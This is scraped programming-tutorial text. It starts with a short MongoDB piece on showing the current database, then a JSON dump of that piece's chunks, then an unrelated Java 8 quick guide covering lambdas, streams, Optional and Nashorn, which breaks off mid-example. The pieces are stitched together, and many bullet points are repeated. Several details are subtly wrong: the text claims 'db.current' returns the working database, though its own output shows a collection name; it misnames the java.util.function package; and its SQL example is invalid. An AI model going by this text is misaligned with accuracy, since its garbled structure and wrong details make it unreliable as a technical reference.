The command to show the database currently used in MongoDB is the following − db; Let us first check how many databases are present. The query is as follows − > show dbs; The following is the output displaying all the databases − admin 0.000GB config 0.000GB local 0.000GB sample 0.000GB sampleDemo 0.000GB studentSearch 0.000GB test 0.003GB Now, we have the list of all databases. Let us use the above syntax to check current database. The query is as follows − > db; The following is the output − sample Look at the above sample output, we are currently using ‘sample’ database. Let us switch the database and verify again the correctness of command db. The query is as follows to switch database. > use test; The following is the output − switched to db test Look at the above sample output, we have changed the database from ‘sample’ to ‘test’. Now let us once again check the current database name. The query is as follows − > db; The following is the output − test Use the function getName(). The query is as follows − > db.getName(); The following is the output − test You can use the current command to check the current working database − The query is as follows − > db.current; The following is the output − test.current
[ { "code": null, "e": 1140, "s": 1062, "text": "The command to show the database currently used in MongoDB is the following −" }, { "code": null, "e": 1144, "s": 1140, "text": "db;" }, { "code": null, "e": 1221, "s": 1144, "text": "Let us first check how many databases are present. The query is as follows −" }, { "code": null, "e": 1233, "s": 1221, "text": "> show dbs;" }, { "code": null, "e": 1292, "s": 1233, "text": "The following is the output displaying all the databases −" }, { "code": null, "e": 1404, "s": 1292, "text": "admin 0.000GB\nconfig 0.000GB\nlocal 0.000GB\nsample 0.000GB\nsampleDemo 0.000GB\nstudentSearch 0.000GB\ntest 0.003GB" }, { "code": null, "e": 1525, "s": 1404, "text": "Now, we have the list of all databases. Let us use the above syntax to check current database. The query is as follows −" }, { "code": null, "e": 1531, "s": 1525, "text": "> db;" }, { "code": null, "e": 1561, "s": 1531, "text": "The following is the output −" }, { "code": null, "e": 1568, "s": 1561, "text": "sample" }, { "code": null, "e": 1718, "s": 1568, "text": "Look at the above sample output, we are currently using ‘sample’ database. Let us switch the database and verify again the correctness of command db." }, { "code": null, "e": 1762, "s": 1718, "text": "The query is as follows to switch database." }, { "code": null, "e": 1774, "s": 1762, "text": "> use test;" }, { "code": null, "e": 1804, "s": 1774, "text": "The following is the output −" }, { "code": null, "e": 1825, "s": 1804, "text": "switched to db test\n" }, { "code": null, "e": 1912, "s": 1825, "text": "Look at the above sample output, we have changed the database from ‘sample’ to ‘test’." }, { "code": null, "e": 1993, "s": 1912, "text": "Now let us once again check the current database name. The query is as follows −" }, { "code": null, "e": 1999, "s": 1993, "text": "> db;" }, { "code": null, "e": 2029, "s": 1999, "text": "The following is the output −" }, { "code": null, "e": 2034, "s": 2029, "text": "test" }, { "code": null, "e": 2088, "s": 2034, "text": "Use the function getName(). The query is as follows −" }, { "code": null, "e": 2104, "s": 2088, "text": "> db.getName();" }, { "code": null, "e": 2134, "s": 2104, "text": "The following is the output −" }, { "code": null, "e": 2140, "s": 2134, "text": "test\n" }, { "code": null, "e": 2212, "s": 2140, "text": "You can use the current command to check the current working database −" }, { "code": null, "e": 2238, "s": 2212, "text": "The query is as follows −" }, { "code": null, "e": 2252, "s": 2238, "text": "> db.current;" }, { "code": null, "e": 2282, "s": 2252, "text": "The following is the output −" }, { "code": null, "e": 2295, "s": 2282, "text": "test.current" } ]
Java 8 - Quick Guide
JAVA 8 is a major feature release of JAVA programming language development. Its initial version was released on 18 March 2014. With the Java 8 release, Java provided supports for functional programming, new JavaScript engine, new APIs for date time manipulation, new streaming API, etc. Lambda expression − Adds functional processing capability to Java. Lambda expression − Adds functional processing capability to Java. Method references − Referencing functions by their names instead of invoking them directly. Using functions as parameter. Method references − Referencing functions by their names instead of invoking them directly. Using functions as parameter. Default method − Interface to have default method implementation. Default method − Interface to have default method implementation. New tools − New compiler tools and utilities are added like ‘jdeps’ to figure out dependencies. New tools − New compiler tools and utilities are added like ‘jdeps’ to figure out dependencies. Stream API − New stream API to facilitate pipeline processing. Stream API − New stream API to facilitate pipeline processing. Date Time API − Improved date time API. Date Time API − Improved date time API. Optional − Emphasis on best practices to handle null values properly. Optional − Emphasis on best practices to handle null values properly. Nashorn, JavaScript Engine − A Java-based engine to execute JavaScript code. Nashorn, JavaScript Engine − A Java-based engine to execute JavaScript code. Consider the following code snippet. import java.util.Collections; import java.util.List; import java.util.ArrayList; import java.util.Comparator; public class Java8Tester { public static void main(String args[]) { List<String> names1 = new ArrayList<String>(); names1.add("Mahesh "); names1.add("Suresh "); names1.add("Ramesh "); names1.add("Naresh "); names1.add("Kalpesh "); List<String> names2 = new ArrayList<String>(); names2.add("Mahesh "); names2.add("Suresh "); names2.add("Ramesh "); names2.add("Naresh "); names2.add("Kalpesh "); Java8Tester tester = new Java8Tester(); System.out.println("Sort using Java 7 syntax: "); tester.sortUsingJava7(names1); System.out.println(names1); System.out.println("Sort using Java 8 syntax: "); tester.sortUsingJava8(names2); System.out.println(names2); } //sort using java 7 private void sortUsingJava7(List<String> names) { Collections.sort(names, new Comparator<String>() { @Override public int compare(String s1, String s2) { return s1.compareTo(s2); } }); } //sort using java 8 private void sortUsingJava8(List<String> names) { Collections.sort(names, (s1, s2) -> s1.compareTo(s2)); } } Run the program to get the following result. Sort using Java 7 syntax: [ Kalpesh Mahesh Naresh Ramesh Suresh ] Sort using Java 8 syntax: [ Kalpesh Mahesh Naresh Ramesh Suresh ] Here the sortUsingJava8() method uses sort function with a lambda expression as parameter to get the sorting criteria. If you want to set up your own environment for Java programming language, then this section guides you through the whole process. Please follow the steps given below to set up your Java environment. Java SE can be downloaded for free from the following link − https://www.oracle.com/technetwork/java/javase/downloads/index-jsp-138363.html You download a version based on your operating system. Follow the instructions to download Java, and run the .exe to install Java on your machine. Once you have installed Java on your machine, you would need to set environment variables to point to correct installation directories. Assuming you have installed Java in c:\Program Files\java\jdk directory − Right-click on 'My Computer' and select 'Properties'. Right-click on 'My Computer' and select 'Properties'. Click on the 'Environment variables' button under the 'Advanced' tab. Click on the 'Environment variables' button under the 'Advanced' tab. Now, alter the 'Path' variable so that it also contains the path to the Java executable. For example, if the path is currently set to 'C:\WINDOWS\SYSTEM32', then change your path to read 'C:\WINDOWS\SYSTEM32;c:\Program Files\java\jdk\bin'. Now, alter the 'Path' variable so that it also contains the path to the Java executable. For example, if the path is currently set to 'C:\WINDOWS\SYSTEM32', then change your path to read 'C:\WINDOWS\SYSTEM32;c:\Program Files\java\jdk\bin'. Assuming you have installed Java in c:\Program Files\java\jdk directory − Edit the 'C:\autoexec.bat' file and add the following line at the end − SET PATH=%PATH%;C:\Program Files\java\jdk\bin Edit the 'C:\autoexec.bat' file and add the following line at the end − SET PATH=%PATH%;C:\Program Files\java\jdk\bin Environment variable PATH should be set to point to where the Java binaries have been installed. Refer to your shell documentation if you have trouble doing this. For example, if you use bash as your shell, then you would add the following line at the end of your '.bashrc: export PATH=/path/to/java:$PATH' To write Java programs, you need a text editor. There are even more sophisticated IDEs available in the market. But for now, you can consider one of the following − Notepad − On Windows machine, you can use any simple text editor like Notepad (recommended for this tutorial) or TextPad. Notepad − On Windows machine, you can use any simple text editor like Notepad (recommended for this tutorial) or TextPad. Netbeans − It is a Java IDE that is open-source and free. It can be downloaded from https://netbeans.org/index.html. Netbeans − It is a Java IDE that is open-source and free. It can be downloaded from https://netbeans.org/index.html. Eclipse − It is also a Java IDE developed by the Eclipse open-source community and can be downloaded from https://www.eclipse.org/. Eclipse − It is also a Java IDE developed by the Eclipse open-source community and can be downloaded from https://www.eclipse.org/. Lambda expressions are introduced in Java 8 and are touted to be the biggest feature of Java 8. Lambda expression facilitates functional programming, and simplifies the development a lot. A lambda expression is characterized by the following syntax. parameter -> expression body Following are the important characteristics of a lambda expression. Optional type declaration − No need to declare the type of a parameter. The compiler can inference the same from the value of the parameter. Optional type declaration − No need to declare the type of a parameter. The compiler can inference the same from the value of the parameter. Optional parenthesis around parameter − No need to declare a single parameter in parenthesis. For multiple parameters, parentheses are required. Optional parenthesis around parameter − No need to declare a single parameter in parenthesis. For multiple parameters, parentheses are required. Optional curly braces − No need to use curly braces in expression body if the body contains a single statement. Optional curly braces − No need to use curly braces in expression body if the body contains a single statement. Optional return keyword − The compiler automatically returns the value if the body has a single expression to return the value. Curly braces are required to indicate that expression returns a value. Optional return keyword − The compiler automatically returns the value if the body has a single expression to return the value. Curly braces are required to indicate that expression returns a value. Create the following Java program using any editor of your choice in, say, C:\> JAVA. public class Java8Tester { public static void main(String args[]) { Java8Tester tester = new Java8Tester(); //with type declaration MathOperation addition = (int a, int b) -> a + b; //with out type declaration MathOperation subtraction = (a, b) -> a - b; //with return statement along with curly braces MathOperation multiplication = (int a, int b) -> { return a * b; }; //without return statement and without curly braces MathOperation division = (int a, int b) -> a / b; System.out.println("10 + 5 = " + tester.operate(10, 5, addition)); System.out.println("10 - 5 = " + tester.operate(10, 5, subtraction)); System.out.println("10 x 5 = " + tester.operate(10, 5, multiplication)); System.out.println("10 / 5 = " + tester.operate(10, 5, division)); //without parenthesis GreetingService greetService1 = message -> System.out.println("Hello " + message); //with parenthesis GreetingService greetService2 = (message) -> System.out.println("Hello " + message); greetService1.sayMessage("Mahesh"); greetService2.sayMessage("Suresh"); } interface MathOperation { int operation(int a, int b); } interface GreetingService { void sayMessage(String message); } private int operate(int a, int b, MathOperation mathOperation) { return mathOperation.operation(a, b); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following output − 10 + 5 = 15 10 - 5 = 5 10 x 5 = 50 10 / 5 = 2 Hello Mahesh Hello Suresh Following are the important points to be considered in the above example. Lambda expressions are used primarily to define inline implementation of a functional interface, i.e., an interface with a single method only. In the above example, we've used various types of lambda expressions to define the operation method of MathOperation interface. Then we have defined the implementation of sayMessage of GreetingService. Lambda expressions are used primarily to define inline implementation of a functional interface, i.e., an interface with a single method only. In the above example, we've used various types of lambda expressions to define the operation method of MathOperation interface. Then we have defined the implementation of sayMessage of GreetingService. Lambda expression eliminates the need of anonymous class and gives a very simple yet powerful functional programming capability to Java. Lambda expression eliminates the need of anonymous class and gives a very simple yet powerful functional programming capability to Java. Using lambda expression, you can refer to any final variable or effectively final variable (which is assigned only once). Lambda expression throws a compilation error, if a variable is assigned a value the second time. Create the following Java program using any editor of your choice in, say, C:\> JAVA. Java8Tester.java public class Java8Tester { final static String salutation = "Hello! "; public static void main(String args[]) { GreetingService greetService1 = message -> System.out.println(salutation + message); greetService1.sayMessage("Mahesh"); } interface GreetingService { void sayMessage(String message); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following output − Hello! Mahesh Method references help to point to methods by their names. A method reference is described using "::" symbol. A method reference can be used to point the following types of methods − Static methods Instance methods Constructors using new operator (TreeSet::new) Create the following Java program using any editor of your choice in, say, C:\> JAVA. import java.util.List; import java.util.ArrayList; public class Java8Tester { public static void main(String args[]) { List names = new ArrayList(); names.add("Mahesh"); names.add("Suresh"); names.add("Ramesh"); names.add("Naresh"); names.add("Kalpesh"); names.forEach(System.out::println); } } Here we have passed System.out::println method as a static method reference. Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following output − Mahesh Suresh Ramesh Naresh Kalpesh Functional interfaces have a single functionality to exhibit. For example, a Comparable interface with a single method ‘compareTo’ is used for comparison purpose. Java 8 has defined a lot of functional interfaces to be used extensively in lambda expressions. Following is the list of functional interfaces defined in java.util.Function package. BiConsumer<T,U> Represents an operation that accepts two input arguments, and returns no result. BiFunction<T,U,R> Represents a function that accepts two arguments and produces a result. BinaryOperator<T> Represents an operation upon two operands of the same type, producing a result of the same type as the operands. BiPredicate<T,U> Represents a predicate (Boolean-valued function) of two arguments. BooleanSupplier Represents a supplier of Boolean-valued results. Consumer<T> Represents an operation that accepts a single input argument and returns no result. DoubleBinaryOperator Represents an operation upon two double-valued operands and producing a double-valued result. DoubleConsumer Represents an operation that accepts a single double-valued argument and returns no result. DoubleFunction<R> Represents a function that accepts a double-valued argument and produces a result. DoublePredicate Represents a predicate (Boolean-valued function) of one double-valued argument. DoubleSupplier Represents a supplier of double-valued results. DoubleToIntFunction Represents a function that accepts a double-valued argument and produces an int-valued result. DoubleToLongFunction Represents a function that accepts a double-valued argument and produces a long-valued result. DoubleUnaryOperator Represents an operation on a single double-valued operand that produces a double-valued result. Function<T,R> Represents a function that accepts one argument and produces a result. IntBinaryOperator Represents an operation upon two int-valued operands and produces an int-valued result. IntConsumer Represents an operation that accepts a single int-valued argument and returns no result. IntFunction<R> Represents a function that accepts an int-valued argument and produces a result. IntPredicate Represents a predicate (Boolean-valued function) of one int-valued argument. IntSupplier Represents a supplier of int-valued results. IntToDoubleFunction Represents a function that accepts an int-valued argument and produces a double-valued result. IntToLongFunction Represents a function that accepts an int-valued argument and produces a long-valued result. IntUnaryOperator Represents an operation on a single int-valued operand that produces an int-valued result. LongBinaryOperator Represents an operation upon two long-valued operands and produces a long-valued result. LongConsumer Represents an operation that accepts a single long-valued argument and returns no result. LongFunction<R> Represents a function that accepts a long-valued argument and produces a result. LongPredicate Represents a predicate (Boolean-valued function) of one long-valued argument. LongSupplier Represents a supplier of long-valued results. LongToDoubleFunction Represents a function that accepts a long-valued argument and produces a double-valued result. LongToIntFunction Represents a function that accepts a long-valued argument and produces an int-valued result. LongUnaryOperator Represents an operation on a single long-valued operand that produces a long-valued result. ObjDoubleConsumer<T> Represents an operation that accepts an object-valued and a double-valued argument, and returns no result. ObjIntConsumer<T> Represents an operation that accepts an object-valued and an int-valued argument, and returns no result. ObjLongConsumer<T> Represents an operation that accepts an object-valued and a long-valued argument, and returns no result. Predicate<T> Represents a predicate (Boolean-valued function) of one argument. Supplier<T> Represents a supplier of results. ToDoubleBiFunction<T,U> Represents a function that accepts two arguments and produces a double-valued result. ToDoubleFunction<T> Represents a function that produces a double-valued result. ToIntBiFunction<T,U> Represents a function that accepts two arguments and produces an int-valued result. ToIntFunction<T> Represents a function that produces an int-valued result. ToLongBiFunction<T,U> Represents a function that accepts two arguments and produces a long-valued result. ToLongFunction<T> Represents a function that produces a long-valued result. UnaryOperator<T> Represents an operation on a single operand that produces a result of the same type as its operand. Predicate <T> interface is a functional interface with a method test(Object) to return a Boolean value. This interface signifies that an object is tested to be true or false. Create the following Java program using any editor of your choice in, say, C:\> JAVA. import java.util.Arrays; import java.util.List; import java.util.function.Predicate; public class Java8Tester { public static void main(String args[]) { List<Integer> list = Arrays.asList(1, 2, 3, 4, 5, 6, 7, 8, 9); // Predicate<Integer> predicate = n -> true // n is passed as parameter to test method of Predicate interface // test method will always return true no matter what value n has. System.out.println("Print all numbers:"); //pass n as parameter eval(list, n->true); // Predicate<Integer> predicate1 = n -> n%2 == 0 // n is passed as parameter to test method of Predicate interface // test method will return true if n%2 comes to be zero System.out.println("Print even numbers:"); eval(list, n-> n%2 == 0 ); // Predicate<Integer> predicate2 = n -> n > 3 // n is passed as parameter to test method of Predicate interface // test method will return true if n is greater than 3. System.out.println("Print numbers greater than 3:"); eval(list, n-> n > 3 ); } public static void eval(List<Integer> list, Predicate<Integer> predicate) { for(Integer n: list) { if(predicate.test(n)) { System.out.println(n + " "); } } } } Here we've passed Predicate interface, which takes a single input and returns Boolean. Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following output − Print all numbers: 1 2 3 4 5 6 7 8 9 Print even numbers: 2 4 6 8 Print numbers greater than 3: 4 5 6 7 8 9 Java 8 introduces a new concept of default method implementation in interfaces. This capability is added for backward compatibility so that old interfaces can be used to leverage the lambda expression capability of Java 8. For example, ‘List’ or ‘Collection’ interfaces do not have ‘forEach’ method declaration. Thus, adding such method will simply break the collection framework implementations. Java 8 introduces default method so that List/Collection interface can have a default implementation of forEach method, and the class implementing these interfaces need not implement the same. public interface vehicle { default void print() { System.out.println("I am a vehicle!"); } } With default functions in interfaces, there is a possibility that a class is implementing two interfaces with same default methods. The following code explains how this ambiguity can be resolved. public interface vehicle { default void print() { System.out.println("I am a vehicle!"); } } public interface fourWheeler { default void print() { System.out.println("I am a four wheeler!"); } } First solution is to create an own method that overrides the default implementation. public class car implements vehicle, fourWheeler { public void print() { System.out.println("I am a four wheeler car vehicle!"); } } Second solution is to call the default method of the specified interface using super. public class car implements vehicle, fourWheeler { public void print() { vehicle.super.print(); } } An interface can also have static helper methods from Java 8 onwards. public interface vehicle { default void print() { System.out.println("I am a vehicle!"); } static void blowHorn() { System.out.println("Blowing horn!!!"); } } Create the following Java program using any editor of your choice in, say, C:\> JAVA. public class Java8Tester { public static void main(String args[]) { Vehicle vehicle = new Car(); vehicle.print(); } } interface Vehicle { default void print() { System.out.println("I am a vehicle!"); } static void blowHorn() { System.out.println("Blowing horn!!!"); } } interface FourWheeler { default void print() { System.out.println("I am a four wheeler!"); } } class Car implements Vehicle, FourWheeler { public void print() { Vehicle.super.print(); FourWheeler.super.print(); Vehicle.blowHorn(); System.out.println("I am a car!"); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following output − I am a vehicle! I am a four wheeler! Blowing horn!!! I am a car! Stream is a new abstract layer introduced in Java 8. Using stream, you can process data in a declarative way similar to SQL statements. For example, consider the following SQL statement. SELECT max(salary), employee_id, employee_name FROM Employee The above SQL expression automatically returns the maximum salaried employee's details, without doing any computation on the developer's end. Using collections framework in Java, a developer has to use loops and make repeated checks. Another concern is efficiency; as multi-core processors are available at ease, a Java developer has to write parallel code processing that can be pretty error-prone. To resolve such issues, Java 8 introduced the concept of stream that lets the developer to process data declaratively and leverage multicore architecture without the need to write any specific code for it. Stream represents a sequence of objects from a source, which supports aggregate operations. Following are the characteristics of a Stream − Sequence of elements − A stream provides a set of elements of specific type in a sequential manner. A stream gets/computes elements on demand. It never stores the elements. Sequence of elements − A stream provides a set of elements of specific type in a sequential manner. A stream gets/computes elements on demand. It never stores the elements. Source − Stream takes Collections, Arrays, or I/O resources as input source. Source − Stream takes Collections, Arrays, or I/O resources as input source. Aggregate operations − Stream supports aggregate operations like filter, map, limit, reduce, find, match, and so on. Aggregate operations − Stream supports aggregate operations like filter, map, limit, reduce, find, match, and so on. Pipelining − Most of the stream operations return stream itself so that their result can be pipelined. These operations are called intermediate operations and their function is to take input, process them, and return output to the target. collect() method is a terminal operation which is normally present at the end of the pipelining operation to mark the end of the stream. Pipelining − Most of the stream operations return stream itself so that their result can be pipelined. These operations are called intermediate operations and their function is to take input, process them, and return output to the target. collect() method is a terminal operation which is normally present at the end of the pipelining operation to mark the end of the stream. Automatic iterations − Stream operations do the iterations internally over the source elements provided, in contrast to Collections where explicit iteration is required. Automatic iterations − Stream operations do the iterations internally over the source elements provided, in contrast to Collections where explicit iteration is required. With Java 8, Collection interface has two methods to generate a Stream. stream() − Returns a sequential stream considering collection as its source. stream() − Returns a sequential stream considering collection as its source. parallelStream() − Returns a parallel Stream considering collection as its source. parallelStream() − Returns a parallel Stream considering collection as its source. List<String> strings = Arrays.asList("abc", "", "bc", "efg", "abcd","", "jkl"); List<String> filtered = strings.stream().filter(string -> !string.isEmpty()).collect(Collectors.toList()); Stream has provided a new method ‘forEach’ to iterate each element of the stream. The following code segment shows how to print 10 random numbers using forEach. Random random = new Random(); random.ints().limit(10).forEach(System.out::println); The ‘map’ method is used to map each element to its corresponding result. The following code segment prints unique squares of numbers using map. List<Integer> numbers = Arrays.asList(3, 2, 2, 3, 7, 3, 5); //get list of unique squares List<Integer> squaresList = numbers.stream().map( i -> i*i).distinct().collect(Collectors.toList()); The ‘filter’ method is used to eliminate elements based on a criteria. The following code segment prints a count of empty strings using filter. List<String>strings = Arrays.asList("abc", "", "bc", "efg", "abcd","", "jkl"); //get count of empty string int count = strings.stream().filter(string -> string.isEmpty()).count(); The ‘limit’ method is used to reduce the size of the stream. The following code segment shows how to print 10 random numbers using limit. Random random = new Random(); random.ints().limit(10).forEach(System.out::println); The ‘sorted’ method is used to sort the stream. The following code segment shows how to print 10 random numbers in a sorted order. Random random = new Random(); random.ints().limit(10).sorted().forEach(System.out::println); parallelStream is the alternative of stream for parallel processing. Take a look at the following code segment that prints a count of empty strings using parallelStream. List<String> strings = Arrays.asList("abc", "", "bc", "efg", "abcd","", "jkl"); //get count of empty string long count = strings.parallelStream().filter(string -> string.isEmpty()).count(); It is very easy to switch between sequential and parallel streams. Collectors are used to combine the result of processing on the elements of a stream. Collectors can be used to return a list or a string. List<String>strings = Arrays.asList("abc", "", "bc", "efg", "abcd","", "jkl"); List<String> filtered = strings.stream().filter(string -> !string.isEmpty()).collect(Collectors.toList()); System.out.println("Filtered List: " + filtered); String mergedString = strings.stream().filter(string -> !string.isEmpty()).collect(Collectors.joining(", ")); System.out.println("Merged String: " + mergedString); With Java 8, statistics collectors are introduced to calculate all statistics when stream processing is being done. List numbers = Arrays.asList(3, 2, 2, 3, 7, 3, 5); IntSummaryStatistics stats = numbers.stream().mapToInt((x) -> x).summaryStatistics(); System.out.println("Highest number in List : " + stats.getMax()); System.out.println("Lowest number in List : " + stats.getMin()); System.out.println("Sum of all numbers : " + stats.getSum()); System.out.println("Average of all numbers : " + stats.getAverage()); Create the following Java program using any editor of your choice in, say, C:\> JAVA. import java.util.ArrayList; import java.util.Arrays; import java.util.IntSummaryStatistics; import java.util.List; import java.util.Random; import java.util.stream.Collectors; import java.util.Map; public class Java8Tester { public static void main(String args[]) { System.out.println("Using Java 7: "); // Count empty strings List<String> strings = Arrays.asList("abc", "", "bc", "efg", "abcd","", "jkl"); System.out.println("List: " +strings); long count = getCountEmptyStringUsingJava7(strings); System.out.println("Empty Strings: " + count); count = getCountLength3UsingJava7(strings); System.out.println("Strings of length 3: " + count); //Eliminate empty string List<String> filtered = deleteEmptyStringsUsingJava7(strings); System.out.println("Filtered List: " + filtered); //Eliminate empty string and join using comma. String mergedString = getMergedStringUsingJava7(strings,", "); System.out.println("Merged String: " + mergedString); List<Integer> numbers = Arrays.asList(3, 2, 2, 3, 7, 3, 5); //get list of square of distinct numbers List<Integer> squaresList = getSquares(numbers); System.out.println("Squares List: " + squaresList); List<Integer> integers = Arrays.asList(1,2,13,4,15,6,17,8,19); System.out.println("List: " +integers); System.out.println("Highest number in List : " + getMax(integers)); System.out.println("Lowest number in List : " + getMin(integers)); System.out.println("Sum of all numbers : " + getSum(integers)); System.out.println("Average of all numbers : " + getAverage(integers)); System.out.println("Random Numbers: "); //print ten random numbers Random random = new Random(); for(int i = 0; i < 10; i++) { System.out.println(random.nextInt()); } System.out.println("Using Java 8: "); System.out.println("List: " +strings); count = strings.stream().filter(string->string.isEmpty()).count(); System.out.println("Empty Strings: " + count); count = strings.stream().filter(string -> string.length() == 3).count(); System.out.println("Strings of length 3: " + count); filtered = strings.stream().filter(string ->!string.isEmpty()).collect(Collectors.toList()); System.out.println("Filtered List: " + filtered); mergedString = strings.stream().filter(string ->!string.isEmpty()).collect(Collectors.joining(", ")); System.out.println("Merged String: " + mergedString); squaresList = numbers.stream().map( i ->i*i).distinct().collect(Collectors.toList()); System.out.println("Squares List: " + squaresList); System.out.println("List: " +integers); IntSummaryStatistics stats = integers.stream().mapToInt((x) ->x).summaryStatistics(); System.out.println("Highest number in List : " + stats.getMax()); System.out.println("Lowest number in List : " + stats.getMin()); System.out.println("Sum of all numbers : " + stats.getSum()); System.out.println("Average of all numbers : " + stats.getAverage()); System.out.println("Random Numbers: "); random.ints().limit(10).sorted().forEach(System.out::println); //parallel processing count = strings.parallelStream().filter(string -> string.isEmpty()).count(); System.out.println("Empty Strings: " + count); } private static int getCountEmptyStringUsingJava7(List<String> strings) { int count = 0; for(String string: strings) { if(string.isEmpty()) { count++; } } return count; } private static int getCountLength3UsingJava7(List<String> strings) { int count = 0; for(String string: strings) { if(string.length() == 3) { count++; } } return count; } private static List<String> deleteEmptyStringsUsingJava7(List<String> strings) { List<String> filteredList = new ArrayList<String>(); for(String string: strings) { if(!string.isEmpty()) { filteredList.add(string); } } return filteredList; } private static String getMergedStringUsingJava7(List<String> strings, String separator) { StringBuilder stringBuilder = new StringBuilder(); for(String string: strings) { if(!string.isEmpty()) { stringBuilder.append(string); stringBuilder.append(separator); } } String mergedString = stringBuilder.toString(); return mergedString.substring(0, mergedString.length()-2); } private static List<Integer> getSquares(List<Integer> numbers) { List<Integer> squaresList = new ArrayList<Integer>(); for(Integer number: numbers) { Integer square = new Integer(number.intValue() * number.intValue()); if(!squaresList.contains(square)) { squaresList.add(square); } } return squaresList; } private static int getMax(List<Integer> numbers) { int max = numbers.get(0); for(int i = 1;i < numbers.size();i++) { Integer number = numbers.get(i); if(number.intValue() > max) { max = number.intValue(); } } return max; } private static int getMin(List<Integer> numbers) { int min = numbers.get(0); for(int i= 1;i < numbers.size();i++) { Integer number = numbers.get(i); if(number.intValue() < min) { min = number.intValue(); } } return min; } private static int getSum(List numbers) { int sum = (int)(numbers.get(0)); for(int i = 1;i < numbers.size();i++) { sum += (int)numbers.get(i); } return sum; } private static int getAverage(List<Integer> numbers) { return getSum(numbers) / numbers.size(); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following result − Using Java 7: List: [abc, , bc, efg, abcd, , jkl] Empty Strings: 2 Strings of length 3: 3 Filtered List: [abc, bc, efg, abcd, jkl] Merged String: abc, bc, efg, abcd, jkl Squares List: [9, 4, 49, 25] List: [1, 2, 13, 4, 15, 6, 17, 8, 19] Highest number in List : 19 Lowest number in List : 1 Sum of all numbers : 85 Average of all numbers : 9 Random Numbers: -1279735475 903418352 -1133928044 -1571118911 628530462 18407523 -881538250 -718932165 270259229 421676854 Using Java 8: List: [abc, , bc, efg, abcd, , jkl] Empty Strings: 2 Strings of length 3: 3 Filtered List: [abc, bc, efg, abcd, jkl] Merged String: abc, bc, efg, abcd, jkl Squares List: [9, 4, 49, 25] List: [1, 2, 13, 4, 15, 6, 17, 8, 19] Highest number in List : 19 Lowest number in List : 1 Sum of all numbers : 85 Average of all numbers : 9.444444444444445 Random Numbers: -1009474951 -551240647 -2484714 181614550 933444268 1227850416 1579250773 1627454872 1683033687 1798939493 Empty Strings: 2 Optional is a container object used to contain not-null objects. Optional object is used to represent null with absent value. This class has various utility methods to facilitate code to handle values as ‘available’ or ‘not available’ instead of checking null values. It is introduced in Java 8 and is similar to what Optional is in Guava. Following is the declaration for java.util.Optional<T> class − public final class Optional<T> extends Object static <T> Optional<T> empty() Returns an empty Optional instance. boolean equals(Object obj) Indicates whether some other object is "equal to" this Optional. Optional<T> filter(Predicate<? super <T> predicate) If a value is present and the value matches a given predicate, it returns an Optional describing the value, otherwise returns an empty Optional. <U> Optional<U> flatMap(Function<? super T,Optional<U>> mapper) If a value is present, it applies the provided Optional-bearing mapping function to it, returns that result, otherwise returns an empty Optional. T get() If a value is present in this Optional, returns the value, otherwise throws NoSuchElementException. int hashCode() Returns the hash code value of the present value, if any, or 0 (zero) if no value is present. void ifPresent(Consumer<? super T> consumer) If a value is present, it invokes the specified consumer with the value, otherwise does nothing. boolean isPresent() Returns true if there is a value present, otherwise false. <U>Optional<U> map(Function<? super T,? extends U> mapper) If a value is present, applies the provided mapping function to it, and if the result is non-null, returns an Optional describing the result. static <T> Optional<T> of(T value) Returns an Optional with the specified present non-null value. static <T> Optional<T> ofNullable(T value) Returns an Optional describing the specified value, if non-null, otherwise returns an empty Optional. T orElse(T other) Returns the value if present, otherwise returns other. T orElseGet(Supplier<? extends T> other) Returns the value if present, otherwise invokes other and returns the result of that invocation. <X extends Throwable> T orElseThrow(Supplier<? extends X> exceptionSupplier) Returns the contained value, if present, otherwise throws an exception to be created by the provided supplier. String toString() Returns a non-empty string representation of this Optional suitable for debugging. This class inherits methods from the following class − java.lang.Object Create the following Java program using any editor of your choice in, say, C:\> JAVA. import java.util.Optional; public class Java8Tester { public static void main(String args[]) { Java8Tester java8Tester = new Java8Tester(); Integer value1 = null; Integer value2 = new Integer(10); //Optional.ofNullable - allows passed parameter to be null. Optional<Integer> a = Optional.ofNullable(value1); //Optional.of - throws NullPointerException if passed parameter is null Optional<Integer> b = Optional.of(value2); System.out.println(java8Tester.sum(a,b)); } public Integer sum(Optional<Integer> a, Optional<Integer> b) { //Optional.isPresent - checks the value is present or not System.out.println("First parameter is present: " + a.isPresent()); System.out.println("Second parameter is present: " + b.isPresent()); //Optional.orElse - returns the value if present otherwise returns //the default value passed. Integer value1 = a.orElse(new Integer(0)); //Optional.get - gets the value, value should be present Integer value2 = b.get(); return value1 + value2; } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following output − First parameter is present: false Second parameter is present: true 10 With Java 8, Nashorn, a much improved javascript engine is introduced, to replace the existing Rhino. Nashorn provides 2 to 10 times better performance, as it directly compiles the code in memory and passes the bytecode to JVM. Nashorn uses invoke dynamics feature, introduced in Java 7 to improve performance. For Nashorn engine, JAVA 8 introduces a new command line tool, jjs, to execute javascript codes at console. Create and save the file sample.js in c:\> JAVA folder. print('Hello World!'); Open console and use the following command. C:\JAVA>jjs sample.js It will produce the following output: Hello World! Open the console and use the following command. C:\JAVA>jjs jjs> print("Hello, World!") Hello, World! jjs> quit() >> Open the console and use the following command. C:\JAVA> jjs -- a b c jjs> print('letters: ' +arguments.join(", ")) letters: a, b, c jjs> Using ScriptEngineManager, JavaScript code can be called and interpreted in Java. Create the following Java program using any editor of your choice in, say, C:\> JAVA. import javax.script.ScriptEngineManager; import javax.script.ScriptEngine; import javax.script.ScriptException; public class Java8Tester { public static void main(String args[]) { ScriptEngineManager scriptEngineManager = new ScriptEngineManager(); ScriptEngine nashorn = scriptEngineManager.getEngineByName("nashorn"); String name = "Mahesh"; Integer result = null; try { nashorn.eval("print('" + name + "')"); result = (Integer) nashorn.eval("10 + 2"); } 